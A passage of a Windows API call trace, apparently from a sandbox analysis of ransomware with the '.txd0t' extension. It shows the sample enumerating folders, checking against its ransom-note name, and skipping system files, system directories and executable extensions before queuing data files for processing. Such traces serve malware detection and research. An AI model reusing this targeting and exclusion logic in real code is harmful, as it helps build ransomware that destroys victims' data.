| out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0085.699] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="C:\\588bce7c90097ed212\\1037\\eula.rtf" [0085.699] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.699] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.699] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.699] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.699] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.699] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.699] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.699] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1037\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" [0085.700] SetEvent (hEvent=0x410) returned 1 [0085.700] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.700] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.700] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.700] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0085.700] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0085.700] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0085.700] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.700] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.700] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.700] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.700] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.700] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.713] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.713] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0085.713] SetEvent (hEvent=0x410) returned 1 [0085.713] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.713] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.713] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.713] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0085.713] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0085.713] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" [0085.713] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.713] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.713] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.714] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.714] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.714] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.714] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.714] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0085.714] GetProcessHeap () returned 0xe30000 [0085.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.714] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1038", cAlternateFileName="")) returned 1 [0085.714] StrCmpW (psz1="1038", psz2=".") returned 1 [0085.714] StrCmpW (psz1="1038", psz2="..") returned 1 [0085.714] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.714] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.714] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1038", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system32\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\local\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.714] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\boot\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\perflogs\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\programdata\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\drivers\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\wsus\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="crypt_detect") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="cryptolocker") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="ransomware") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\WINDOWS") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.715] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files") returned 0x0 [0085.715] GetProcessHeap () returned 0xe30000 [0085.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.715] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0085.715] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\*") returned="C:\\588bce7c90097ed212\\1038\\*" [0085.715] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0085.715] StrCmpW (psz1=".", psz2=".") returned 0 [0085.715] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.715] StrCmpW (psz1="..", psz2=".") returned 1 [0085.715] StrCmpW (psz1="..", psz2="..") returned 0 [0085.715] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.715] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.715] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.715] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0085.715] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0085.715] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="C:\\588bce7c90097ed212\\1038\\eula.rtf" [0085.715] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.716] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.716] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.716] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.716] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.716] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.726] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.726] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1038\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" [0085.726] SetEvent (hEvent=0x3fc) returned 1 [0085.726] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.726] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.726] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.726] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0085.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0085.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0085.726] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.726] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.726] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.726] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.727] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.727] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.740] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.740] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0085.740] SetEvent (hEvent=0x418) returned 1 [0085.740] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.741] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.741] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.741] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0085.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0085.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" [0085.741] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.741] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.741] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.741] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.741] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.741] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.741] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0085.741] GetProcessHeap () returned 0xe30000 [0085.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.741] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, 